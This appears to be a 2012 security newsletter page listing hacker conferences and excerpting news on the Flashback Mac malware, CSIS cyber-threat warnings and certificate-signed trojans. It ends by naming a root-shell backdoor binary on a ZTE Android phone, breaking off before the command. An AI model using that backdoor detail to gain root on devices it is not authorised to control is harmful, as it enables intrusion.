	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hack3rCon^3</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 19-21, 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Charleston, WV <br class="kix-line-break" /><br />
	</span><a href="http://hack3rcon.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://hack3rcon.org/</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hacker Wars &#8212; The Movie</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ever wanted to participate in Live action Capture the Flag? Well here is your chance</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What: Thi contest is modeled on so-called &quot;penetration tests&quot; which is when ethical hackers attempt to break in to a company&#39;s computer systems with the target&#39;s permission. &nbsp;This is in an effort to find security problems before the bad guys do. &nbsp;The contest won&#39;t just involve sitting at computers, it will also involve other typical activities: performing reconnaissance of physical facilities, surveillance of individuals, urban exploration, infiltration of buildings, and surreptitious contact with moles in the target organization.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.kickstarter.com/projects/278183749/hacker-wars"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.kickstarter.com/projects/278183749/hacker-wars</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.theglobeandmail.com/news/politics/cyber-spies-will-target-smartphones-tablets-csis-report/article2429242"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theglobeandmail.com/news/politics/cyber-spies-will-target-smartphones-tablets-csis-report/article2429242</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hand-held devices such as smartphones and tablets could be the next frontier for cyber-spies and other rogue players in the digital world, warns a newly declassified assessment from Canada&#39;s intelligence agency.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Opportunities for malicious hackers are growing as computer systems move from the back rooms of corporations and government agencies into the palms and laptops of employees, says the Canadian Security Intelligence Service assessment.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;New cyber attack tools and techniques will be developed in efforts to compromise Canadian public- and private-sector systems,&rdquo; says the report, perhaps the agency&#39;s most ominous forecast to date on the perils of cyberspace.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;The cyber-related threat environment will evolve and become more complex, creating ever greater challenges for Canada within the context of national security.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The 18-page CSIS report, Cyber Threats and Security: An Overview, was obtained by The Canadian Press under the Access to Information Act. Though heavily edited, the November 2011 assessment, originally classified top secret, is another sign of the intelligence service&#39;s growing interest in the dangers emerging from cyberspace.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cyber threats posed by unfriendly states, groups and individuals &ldquo;affect Canada&#39;s national and economic security,&rdquo; says the report. &ldquo;This has implications for its critical infrastructure, the operation of its public and private sectors, and its domestic and international interests.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The computer systems that Canadians rely on every day to work and play also underpin key services including water treatment, and hydro and nuclear power plants, CSIS notes.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While there may be a variety of technical measures and procedures to secure information systems, the &ldquo;weak point&rdquo; remains the human being because he or she generally uses the technology &ldquo;without understanding it,&rdquo; says the report.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.computerworld.com/s/article/9227155/Apple_ships_first_Leopard_security_update_in_nearly_a_year"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.computerworld.com/s/article/9227155/Apple_ships_first_Leopard_security_update_in_nearly_a_year</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple on Monday issued its first security-related update for OS X 10.5, or Leopard, in nearly a year, to disable long-outdated versions of Adobe&#39;s Flash Player.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security Update</span><a href="http://support.apple.com/kb/HT1222"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> 2012-003</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> does not patch any known vulnerabilities, but is instead a Leopard-specific version of what Apple released last week for OS X 10.6, or Snow Leopard, and the newer OS X 10.7, better known as Lion.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Like those updates, 2012-003 for Leopard removes versions of Flash Player older than 10.1.102.64. Adobe issued that edition of Flash in November 2010. It was also the final version Apple delivered to its customers before it stopped maintaining Flash.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Monday&#39;s update will not be installed on PowerPC-equipped Macs running Leopard.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On May 9,</span><a href="http://www.computerworld.com/s/article/9227038/Apple_patches_Safari_blocks_outdated_Flash_Player"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Apple disabled older copies of Flash Player</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> on Snow Leopard and Lion using an update to Safari 5.1.7. Because that version of Apple&#39;s browser doesn&#39;t support Leopard, the company instead updated the operating system.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The newest version of Flash Player for Leopard is 10.3.183.19, which was released earlier this month. That newest version, which requires an Intel processor, can be downloaded from</span><a href="http://get.adobe.com/flashplayer/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Adobe&#39;s website</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Also on Monday, Apple released a version of the</span><a href="http://support.apple.com/kb/HT5273"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Flashback malware removal tool</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> designed for Leopard. Apple had offered the same tool to Snow Leopard and Lion users on April 12.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Flashback seek-and-destroy tool was Apple&#39;s response to a massive campaign that exploited a Java vulnerability to</span><a href="http://www.computerworld.com/s/article/9225974/Flashback_malware_infects_2_of_all_Macs"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> infect hundreds of thousands of Macs</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple still maintains Java for users of Snow Leopard and Lion, but last patched the Oracle software for Leopard users in June 2011.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unlike the Snow Leopard and Lion Flashback removal tool update, the one for Leopard said nothing about automatically disabling the Java plug-in used by browsers such as Safari, Chrome or Firefox.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://arstechnica.com/apple/2012/05/apple-reportedly-asked-kaspersky-lab-to-analyze-os-x/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/apple/2012/05/apple-reportedly-asked-kaspersky-lab-to-analyze-os-x/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple is drawing upon the expertise of security researchers from Kaspersky Lab when it comes to security on OS X, according to Kaspersky CTO Nikolai Grebennikov. In an interview with Computing News, Grebennikov revealed that Apple had asked his firm to begin analyzing OS X in order to help improve its security. The request follows the recent high-profile Flashback scare, and shows that Apple is beginning to take steps to take OS X security more seriously.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Mac OS is really vulnerable, and Apple recently invited us to improve its security. We&#39;ve begun an analysis of its vulnerabilities, and the malware targeting it,&quot; Grebennikov told Computing News. &quot;Our first investigations show Apple doesn&#39;t pay enough attention to security. For example, Oracle closed a vulnerability in Java, which was a target for a major botnet several months ago.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Following reports that more than a half-million Macs were infected by Flashback thanks to a then-unpatched Java vulnerability in OS X, Kaspersky Lab boldly told members of the media that &quot;Mac OS X invulnerability&quot; to malware is a myth. Although the statement generated grousing among the Mac-using community, it&#39;s true&mdash;security researchers have been arguing for years that Macs were only perceptibly &quot;safer&quot; because of their relatively low market share. It would only be a matter of time before attackers began focusing on the Mac, and Kaspersky argued last month that we have officially reached that point. &quot;Market share brings attacker motivation,&quot; the firm said in April. &quot;Expect more drive-by downloads, more Mac OS X mass-malware. Expect cross-platform exploit kits with Mac-specific exploits.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The fact that Apple is consulting Kaspersky now for help doesn&#39;t come as a huge surprise, though. As we have learned from our own sources, Apple often brings in outside firms to present and discuss ideas for OS X and iOS. Since Mac hardware is increasingly becoming a target for malicious attackers, it makes sense that Apple would take the input from firms like Kaspersky more seriously as it prepares to move forward with its next version of OS X, Mountain Lion. Although Mountain Lion will allow users to heavily restrict the origin of software installed on their machines for security purposes, attacks like Flashback don&#39;t necessarily need users to install anything in order to take advantage of vulnerabilities. (Flashback installed itself on victims&#39; machines via Java after users visited infected WordPress websites.) As such, malware will likely continue to be a concern for Mac users.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple did not respond to our request for comment by publication time.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://blogs.norman.com/2012/security-research/the-shiqiang-gang"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blogs.norman.com/2012/security-research/the-shiqiang-gang</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a series of blog posts our colleagues at</span><a href="http://blog.trendmicro.com/cve-2012-0158-now-being-used-in-more-tibetan-themed-targeted-attack-campaigns"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Trend</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and</span><a href="http://labs.alienvault.com/labs/index.php/2012/cve-2012-0158-tibet-targeted-attacks-and-so-on"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> AlienVault</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> have detailed recent attacks on NGO&rsquo;s, and how trojanized RTF files have been used as vehicles to plant various remote access trojans on unsuspecting users using the CVE-2012-0158 vulnerability.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In addition, they both mention that apparently stolen digital &nbsp;certificates have been used to sign the trojan files. The certificates mentioned were both revoked April 20th:</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 36pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Shenzhen Xuri Weiye Technology Co., Ltd.</span></p>
<p dir="ltr" style="margin-left: 36pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">VeriSign Class 3 Code Signing 2010 CA</span></p>
<p dir="ltr" style="margin-left: 36pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&lrm;serial no. 3893f13dd39fe088fdf54ee008ae38e1</span></p>
<p dir="ltr" style="margin-left: 36pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Valid from 8. December 2011 to 8. December 2012</span></p>
<p dir="ltr" style="margin-left: 36pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Revocation Date: Apr 20 18:02:03 2012 GMT</span></p>
<p dir="ltr" style="margin-left: 36pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Quanzhou Xiegao Microwave Electronic Co., Ltd</span></p>
<p dir="ltr" style="margin-left: 36pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thawte Code Signing CA &ndash; G2</span></p>
<p dir="ltr" style="margin-left: 36pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&lrm;serial no. 382d08b7caf01c6b6434c35fe0445b83</span></p>
<p dir="ltr" style="margin-left: 36pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Valid from 31. March 2012 to 1. April 2013</span></p>
<p dir="ltr" style="margin-left: 36pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Revocation Date: Apr 20 08:57:47 2012 GMT</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Quanzhou Xiegao certificate contains a peculiarity, one that links that attack with many others, and has prompted us to dub the people responsible The Shiqiang Gang.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Digital code signing certificates are often complex. They contain &nbsp;a lot more information that most people think of, and some which is not very visible up front. Some of this information is found in the SignerInfo structure, which contains important information like issuing Certificate Authority, the certificate&rsquo;s serial number, and various hashes. It also contains the optional fields programName and moreInfo, where the latter is intended for storing a website link to more information about the signer. However, in this case there is no URL. Instead it says:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;identifierBegin:shiqiang:identifierEnd&ldquo;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Google, &ldquo;shiqiang&rdquo; means something like &ldquo;Top Ten&rdquo;. (I hope it does not mean anything nasty).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There&rsquo;s no particular reason for that string to be there. It is probably an unintended result of reusing a build setup without fully sanitizing it. However, it is interesting to see what shows up once we start querying our malware databases for certificates containing this string:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://pastebin.com/wamYsqTV"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pastebin.com/wamYsqTV</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The ZTE Score M is an Android 2.3.4 (Gingerbread) phone available in the United States on MetroPCS, made by Chinese telecom ZTE Corporation.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There is a setuid-root application at /system/bin/sync_agent that serves no function besides providing a root shell backdoor on the device. &nbsp;Just give the magic, hard-coded password to get a root shell:</span></p>
<p>&nbsp;</p>
